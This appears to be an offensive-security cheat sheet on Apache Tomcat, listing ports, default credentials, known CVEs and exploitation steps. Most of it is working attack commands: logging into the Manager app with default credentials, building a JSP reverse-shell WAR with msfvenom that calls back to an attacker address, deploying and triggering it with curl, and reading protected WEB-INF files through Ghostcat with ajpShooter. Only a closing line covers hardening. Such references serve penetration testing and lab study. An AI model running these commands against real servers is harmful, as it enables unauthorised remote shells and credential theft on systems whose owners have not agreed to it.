Apache Tomcat | KagisoSec

Ports

Port	Proto	Notes
`8080`	tcp	HTTP connector
`8443`	tcp	HTTPS connector
`8009`	tcp	AJP connector (Ghostcat)

Fingerprint

Default Tomcat splash page; /manager/html and /host-manager/html
Server: Apache-Coyote/1.1

Key files

Path	Holds	Sensitive
`conf/tomcat-users.xml`	manager-gui / manager-script credentials	sensitive
`conf/server.xml`	connectors and the shutdown port
`webapps/`	deployed apps (drop a WAR here)

Default / weak creds

tomcat / tomcat, admin / admin, and other shipped defaults

Service users

tomcat

Known CVEs

CVE	Impact
CVE-2020-1938	Ghostcat, AJP file read/include of WEB-INF
CVE-2017-12617	JSP upload RCE when PUT/readonly misconfigured

Exploitation primitives

Manager app: deploy a malicious .war (msfvenom java/jsp) for a shell as the tomcat user
Ghostcat (8009): read WEB-INF/web.xml and config, sometimes leaking creds
Default or reused manager credentials

Overview

Tomcat on 8080 serves Java web apps, and its Manager application can deploy new ones. Get into /manager and a WAR upload is a shell.

Enumeration and deploy

Check manager access with default creds:

curl -s http://<TARGET>:8080/manager/html -u tomcat:tomcat

Build a WAR reverse shell:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<YOUR_IP> LPORT=4444 -f war -o s.war

Deploy it:

curl -u tomcat:tomcat -T s.war "http://<TARGET>:8080/manager/text/deploy?path=/s"

Trigger it:

curl http://<TARGET>:8080/s/

Ghostcat — AJP file read (CVE-2020-1938)

When the AJP connector on 8009 is exposed, read protected files under the app root (e.g. WEB-INF/web.xml, which often leaks DB creds or manager passwords) without authentication:

python3 ajpShooter.py http://<TARGET> 8009 /WEB-INF/web.xml read

If the app lets you upload a file (any extension), Ghostcat can also include it as JSP for RCE. Use any recovered manager creds from web.xml to then deploy a WAR as above.

Hardening

Remove default manager users, restrict the Manager app by IP, disable the AJP connector if unused, and patch Ghostcat.